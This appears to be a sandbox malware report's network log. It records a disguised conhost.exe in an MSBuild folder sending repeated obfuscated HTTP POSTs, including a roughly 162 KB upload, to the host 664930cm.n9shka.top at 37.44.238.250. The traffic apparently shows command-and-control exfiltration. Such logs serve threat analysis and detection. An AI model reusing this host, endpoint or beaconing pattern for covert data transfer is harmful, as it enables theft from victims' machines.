                                                          Oct 1, 2024 05:57:49.717082977 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.64972537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:49.830857992 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.64972637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:49.866766930 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:50.218527079 CEST1112OUTData Raw: 5d 52 5a 5c 59 47 51 54 5c 58 57 5a 54 5b 55 5d 59 53 59 5f 50 5c 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]RZ\YGQT\XWZT[U]YSY_P\VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-3S6;4]*"Z&>>%(48343X8V&.W1><"<!F/'P,9
                                                          Oct 1, 2024 05:57:50.472203016 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:50.601152897 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.64972737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:50.734035015 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:51.090190887 CEST1120OUTData Raw: 58 5d 5f 5b 5c 45 51 54 5c 58 57 5a 54 58 55 51 59 56 59 57 50 50 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]_[\EQT\XWZTXUQYVYWPPVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!9#3S5(>2-&>&8/($ &1.%!($U+!F/'P,%
                                                          Oct 1, 2024 05:57:51.341443062 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:51.469230890 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.64972937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:51.640049934 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:51.996505976 CEST1112OUTData Raw: 58 5d 5a 5c 5c 45 54 50 5c 58 57 5a 54 5b 55 5f 59 57 59 57 50 59 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]Z\\ETP\XWZT[U_YWYWPYVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:?6]#="5]'"Y2+\;;3>/&1$+!4U?!F/'P,1
                                                          Oct 1, 2024 05:57:52.543951988 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:52.544123888 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P
                                                          Oct 1, 2024 05:57:52.544197083 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.64973037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:53.102478981 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.64973137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:53.230252028 CEST373OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 162168
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:53.574687958 CEST12360OUTData Raw: 58 54 5f 5c 5c 44 54 52 5c 58 57 5a 54 59 55 58 59 53 59 57 50 5b 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_\\DTR\XWZTYUXYSYWP[VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT", # (+=!Z'>2^1+]/4' V$111\?2+(9!F/'P,!
                                                          Oct 1, 2024 05:57:53.581172943 CEST12360OUTData Raw: 14 01 3b 50 24 2e 3a 36 30 5b 2d 3e 34 40 2b 3f 00 50 3f 0f 23 3c 3e 54 06 2f 1b 09 24 3a 2e 2b 34 3e 1c 23 0b 2b 02 14 36 01 1c 0d 2a 3f 01 05 3c 43 0f 37 2a 2e 02 33 02 30 38 3d 3a 04 00 5f 21 33 29 53 0f 28 38 1b 3e 20 29 07 36 2b 2c 17 27 5e
                                                          Data Ascii: ;P$.:60[->4@+?P?#<>T/$:.+4>#+6*?<C7*.308=:_!3)S(8> )6+,'^848\1*&802/<= +Y7 88$_0;$Y%Y>),ZW/!2.<&=%<!#(8??"#4<:+"B-2,$']';-,1=00S8]9>3C<,"2U"&X8+#9 &-<[.=359&.^
                                                          Oct 1, 2024 05:57:53.582099915 CEST4944OUTData Raw: 3c 56 32 5a 2e 5d 30 2f 28 3a 1a 3b 3b 5c 58 07 3f 23 0d 17 0e 54 22 29 0a 2a 26 2f 3f 3c 24 09 3e 59 01 5d 3e 30 28 2d 0d 03 51 2b 39 2f 2c 22 35 29 01 06 13 55 3e 1d 0b 07 31 02 0f 3b 23 59 2f 30 23 53 0e 04 01 2b 0e 22 2d 1d 09 1b 13 58 24 30
                                                          Data Ascii: <V2Z.]0/(:;;\X?#T")*&/?<$>Y]>0(-Q+9/,"5)U>1;#Y/0#S+"-X$0?:<&"X7Y]&3.,)6C*Q?"\0(-Q\(.=;Z9=X !!.2$>T -&[^9>)==]7W? Y0)9"Z<6<<!47?0;'5,T)#=6%_":(H+(6;6W'-9(%**:\-X
                                                          Oct 1, 2024 05:57:53.582130909 CEST2472OUTData Raw: 3e 2e 2b 50 3f 06 2a 07 3e 0a 3c 1c 25 5a 24 55 32 06 18 02 31 32 1e 38 2c 2a 5a 43 2b 5f 5d 3b 3a 0e 3e 35 38 1e 35 14 22 02 31 5f 32 3c 2c 04 0b 24 38 5c 34 05 37 22 0b 59 43 36 39 33 25 3b 3f 5f 17 18 09 3d 30 19 0a 2e 39 12 0d 55 19 05 09 05
                                                          Data Ascii: >.+P?*><%Z$U2128,*ZC+_];:>585"1_2<,$8\47"YC693%;?_=0.9UY:^=U/]SX>0233$R%[V:[)=4<1/!>1+!E'\\^1"<'0'Z*X,/5?(!)4 3<%$-+9804'\=5US;U)X<!!Y$>67X%?=&80&5
                                                          Oct 1, 2024 05:57:53.582144022 CEST2472OUTData Raw: 0b 0c 50 51 09 38 0a 0b 3d 0a 25 58 30 02 28 04 13 02 3c 06 3a 2b 06 5f 3c 2e 02 58 39 1c 26 51 3e 38 04 15 28 02 20 32 23 58 34 10 0d 32 15 54 39 30 2a 1d 2e 56 02 36 3d 5f 3f 1a 25 23 21 5b 08 5b 04 12 31 00 3c 19 06 09 24 2d 08 2f 23 0d 3e 57
                                                          Data Ascii: PQ8=%X0(<:+_<.X9&Q>8( 2#X42T90*.V6=_?%#![[1<$-/#>W1'?+0W?$7]/#66[:92(0+=4+Z?1&'';X)(,>0; 6=?-+9U%%)X0=%[W?+%=)9!78)!%0,%?9&?.P;?9[2Q>--=$"T>2!4/*"Z[9(
                                                          Oct 1, 2024 05:57:53.586725950 CEST7416OUTData Raw: 26 3f 25 2d 3e 5c 56 2e 30 35 28 19 33 32 33 07 09 09 01 1a 3f 54 0b 19 24 04 2c 1f 24 12 3d 57 25 5a 04 1d 2f 1a 58 25 32 19 2f 14 23 3c 08 2f 29 55 39 13 38 24 04 0d 38 02 04 5f 0b 06 2b 39 35 00 25 55 25 01 27 1b 27 26 39 1b 29 07 34 39 33 11
                                                          Data Ascii: &?%->\V.05(323?T$,$=W%Z/X%2/#</)U98$8_+95%U%''&9)4938(\1:.!@0U19 ](S>:8.,"63_:-0Z:*:=5>73(Q3'&^>!$(>1#P7%"Q:$=?'2>+-7;?89T)]&?5]V?5+<>3%R5?/7Z6$,1!$A1<6(!
                                                          Oct 1, 2024 05:57:53.586760998 CEST2472OUTData Raw: 3e 30 31 34 27 22 05 13 09 3f 1b 3e 39 5d 26 51 2f 2a 30 23 37 20 16 42 0a 31 0e 1c 24 1d 31 2b 22 3e 09 3c 24 05 0f 1e 24 2c 36 54 32 27 37 3f 32 34 2f 53 3b 12 22 2a 02 0a 13 37 0f 06 04 04 3f 3c 1c 1e 3b 5c 38 5e 0d 3b 2e 23 2a 3f 3b 00 3e 1d
                                                          Data Ascii: >014'"?>9]&Q/*0#7 B1$1+"><$$,6T2'7?24/S;"*7?<;\8^;.#*?;>91?,<428]#2: =(W61_0*"489QT'VR:9&(>;,'X"!?2\9"/8?#?Y5=C#4%$2?2=A>$>??,!'5<=/#(0>&582?.+53:*\Y8<%==!>&"/[88-0[7(>>
                                                          Oct 1, 2024 05:57:53.586772919 CEST2472OUTData Raw: 37 3f 2c 12 0e 06 3b 12 39 08 21 2c 25 34 3d 58 25 33 37 1e 33 3d 22 05 0d 24 3c 21 3c 07 27 2b 33 3d 50 14 25 57 37 58 30 01 07 41 2f 2b 26 1f 26 09 18 17 39 38 17 20 39 58 14 21 35 3c 2c 10 27 50 23 14 2c 2c 5c 20 0c 2c 47 18 2f 54 3d 2c 3d 39
                                                          Data Ascii: 7?,;9!,%4=X%373="$<!<'+3=P%W7X0A/+&&98 9X!5<,'P#,,\ ,G/T=,=9>4_8V%;=/:['\)]<14:S8V1V%,76%Y54C\1 +'5T)'_^X/]"%=(>4/+>,!\[-R5 -'U?0*'\ ?;X$!;<T#*YZU %_V8<&/6,/8
                                                          Oct 1, 2024 05:57:53.587814093 CEST4944OUTData Raw: 24 26 1b 28 33 02 1a 31 3f 3f 38 12 38 29 1c 05 3d 1f 3e 29 0e 27 5b 22 38 1e 03 31 2e 28 02 3d 24 02 2b 5e 24 5d 38 5e 3d 21 5f 3b 3f 3e 26 14 33 35 04 10 2e 58 1a 0f 37 06 3f 18 38 0b 0e 22 22 2d 00 15 01 32 2c 32 0c 16 05 00 14 56 26 2d 3d 2d
                                                          Data Ascii: $&(31??88)=>)'["81.(=$+^$]8^=!_;?>&35.X7?8""-2,2V&-=-.&*8)T$:8-'3#-12$,2-$>:0<;5;5?3>:9&T=(5Z7<7$(7 :053&*1;?$:"$Y)5/_^>39V12W(T.<6&>966;;1,["33)2:"T9-
                                                          Oct 1, 2024 05:57:53.630846024 CEST34608OUTData Raw: 33 10 3d 1d 08 02 24 37 01 23 02 0c 25 3c 02 1b 26 08 13 50 31 27 32 5b 27 56 15 2a 04 5b 04 38 0d 37 3c 5b 34 5b 37 1f 28 2d 58 59 3f 31 28 13 30 2a 56 32 36 07 3d 59 3a 0e 00 15 0e 41 32 10 0b 3f 51 18 32 2f 0a 11 39 1a 53 06 34 3f 2f 07 0b 00
                                                          Data Ascii: 3=$7#%<&P1'2['V*[87<[4[7(-XY?1(0*V26=Y:A2?Q2/9S4?/0#&>_!*?<,\>"2?#Y>+>(_723</]=/'?3-T9-A=48S9=PW(:*^$.>?#9%Y+-[/69"9 U"4'C$>3W=?0$(Y \?47 2T\< &_]3.Y+?-%T*,&
                                                          Oct 1, 2024 05:57:53.833775043 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:54.491976023 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.64973237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:53.380731106 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:53.730943918 CEST1120OUTData Raw: 5d 51 5f 54 59 44 54 51 5c 58 57 5a 54 5e 55 5d 59 51 59 5a 50 51 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]Q_TYDTQ\XWZT^U]YQYZPQVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!X903!;$>-$>"%],;R',S%W-%*<8(!F/'P,=
                                                          Oct 1, 2024 05:57:53.988357067 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:54.117408037 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.64973337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:54.250392914 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:54.606724977 CEST1112OUTData Raw: 58 52 5f 5f 5c 46 54 51 5c 58 57 5a 54 5b 55 5c 59 57 59 57 50 5a 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XR__\FTQ\XWZT[U\YWYWPZVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-+R +4[?163-"[1- 8%-#2-14>(8R()!F/'P,=
                                                          Oct 1, 2024 05:57:54.856756926 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:54.989316940 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.64973437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:54.877588034 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:55.230986118 CEST1820OUTData Raw: 58 51 5a 5e 59 41 54 54 5c 58 57 5a 54 5a 55 5a 59 51 59 5f 50 5a 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQZ^YATT\XWZTZUZYQY_PZVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!X:+U ;;=:3>51(/3?S'.$&""%$_<4(9!F/'P,-
                                                          Oct 1, 2024 05:57:55.494029999 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:55.741503000 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 5e 33 24 36 1e 21 12 22 03 29 11 3f 5d 30 37 09 5b 2d 3d 06 42 32 2f 34 07 3a 32 3e 58 3f 3a 29 01 32 3e 38 00 25 22 3a 55 27 36 20 5f 0d 10 22 10 23 28 0b 0e 2c 00 2c 00 29 1f 2c 09 25 23 23 10 30 33 32 57 3f 3e 2b 0e 26 2c 08 0e 30 12 0b 0c 2f 36 34 5a 2a 37 30 1f 20 11 2d 56 02 1e 22 50 26 06 0b 56 20 01 29 5f 27 38 24 5d 22 06 35 13 29 10 30 12 25 24 31 03 3e 3d 20 01 29 2c 38 01 21 2a 21 5a 20 1f 22 0a 27 23 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %^3$6!")?]07[-=B2/4:2>X?:)2>8%":U'6 _"#(,,),%##032W?>+&,0/64Z*70 -V"P&V )_'8$]"5)0%$1>= ),8!*!Z "'#'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.64973537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:55.182926893 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:55.480750084 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:55.531740904 CEST1120OUTData Raw: 58 57 5f 5f 59 43 51 56 5c 58 57 5a 54 59 55 5e 59 52 59 5d 50 5b 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XW__YCQV\XWZTYU^YRY]P[VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9346'?")'>&( 8R3 &%%4>Z?!7?)!F/'P,!
                                                          Oct 1, 2024 05:57:56.113842010 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:56.246516943 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.64973637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:56.377403021 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:56.731025934 CEST1120OUTData Raw: 5d 55 5a 5b 59 40 54 5f 5c 58 57 5a 54 5d 55 5e 59 52 59 5f 50 51 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]UZ[Y@T_\XWZT]U^YRY_PQVE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y.U+W!];=-[&=)$(/8$1>W2"?;+)!F/'P,1
                                                          Oct 1, 2024 05:57:56.982575893 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:57.108823061 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.64973737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
